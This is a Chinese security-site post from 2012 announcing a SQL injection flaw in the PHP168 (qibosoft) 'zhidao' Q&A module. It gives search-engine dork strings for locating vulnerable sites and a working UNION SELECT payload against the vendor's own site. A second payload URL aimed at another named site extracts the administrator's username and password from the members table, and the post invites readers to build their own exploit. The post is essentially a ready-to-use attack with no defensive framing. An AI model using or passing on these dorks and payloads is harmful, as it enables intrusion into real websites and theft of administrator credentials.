热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

PHP168知道系统注入漏洞

发布时间:2012-10-27 03:21文章来源:网络文章作者:书生 点击次数:
摘要:发布日期:2012-10.26 发布作者:书生 漏洞类型:sql注入 漏洞描述: inurl:zhidao Powered by qibosoft inurl:w8 Powered by qibosoft inurl:ask Powered by qibosoft 官网测试 http://v7.php168.com/zhidao/user.php?j=questionu=-1+union+select+1,2,3,co...

发布日期:2012-10.26

发布作者:书生

漏洞类型:sql注入

漏洞描述:

inurl:zhidao Powered by qibosoft inurl:w8 Powered by qibosoft inurl:ask Powered by qibosoft

官网测试

http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--

数据库版本:4.0

下面是实例
http://www.yunsec.net/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--

EXP自己构造!

标签分类:

上一篇:phpweb成品网站最新版上传&注入漏洞
下一篇:91736cms cookies注入漏洞